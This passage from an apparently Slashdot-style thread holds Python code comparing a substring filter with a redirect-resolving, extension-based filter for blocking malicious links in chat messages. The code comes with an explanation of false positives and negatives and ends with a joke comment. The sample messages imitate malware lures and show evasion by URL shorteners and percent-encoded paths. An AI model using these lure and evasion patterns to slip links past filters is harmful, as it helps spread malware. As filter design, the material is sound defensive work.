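    return any(s in message for s in BLOCKED_EXTENSIONS)


def canonicalize(url: str) -> str:
    """Lowercase scheme and host, percent-decode the path, drop the fragment,
    so that differently spelled URLs compare equal."""
    parts = urlsplit(url)
    path = unquote(parts.path) or "/"
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(),
                       path, parts.query, ""))


def resolve(url: str, redirects: dict, max_hops: int = 5) -> str:
    """Follow the (constructed) redirect map to the final destination and
    return it canonicalized. The hop limit and the seen-set stop loops."""
    seen = set()
    current = canonicalize(url)
    for _ in range(max_hops):
        if current in seen:
            break
        seen.add(current)
        nxt = redirects.get(current)
        if nxt is None:
            break
        current = canonicalize(nxt)
    return current


def path_extension(url: str) -> str:
    """Extension of the last path segment, lowercased; '' if none."""
    last = urlsplit(url).path.rsplit("/", 1)[-1]
    return last[last.rfind("."):].lower() if "." in last else ""


def normalized_filter(message: str, redirects: dict = REDIRECTS) -> bool:
    """Decide on the real extension of each link's final destination rather
    than on substrings of the message text."""
    for url in URL_RE.findall(message):
        if path_extension(resolve(url, redirects)) in BLOCKED_EXTENSIONS:
            return True
    return False


def classify(message: str, redirects: dict = REDIRECTS) -> dict:
    """Both verdicts side by side, for comparing the two approaches."""
    return {"naive": naive_filter(message),
            "normalized": normalized_filter(message, redirects)}


if __name__ == "__main__":
    samples = [
        "i found a pic of you at http://example.com/download.php?name=virus",
        "release notes at http://example.com/notes.script",
        "look at http://short.example/x1",
        "look at http://example.com/payload.%70hp",
    ]
    for msg in samples:
        print(classify(msg), msg)
```

    classify() returns both verdicts so the four constructed cases can be compared: the download.php link is caught either way, notes.script is a false positive of the substring rule (".scr" is a substring of ".script"), and the shortened link and the percent-encoded path are false negatives of it. Resolving redirects is simulated here with a table; a real filter would have to fetch each link, which costs a request per message and is why services tend to reach for the cheap substring list instead.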

  21. They ought to censor.... by madbawa · · Score: 2, Funny

    ....msmsgs.exe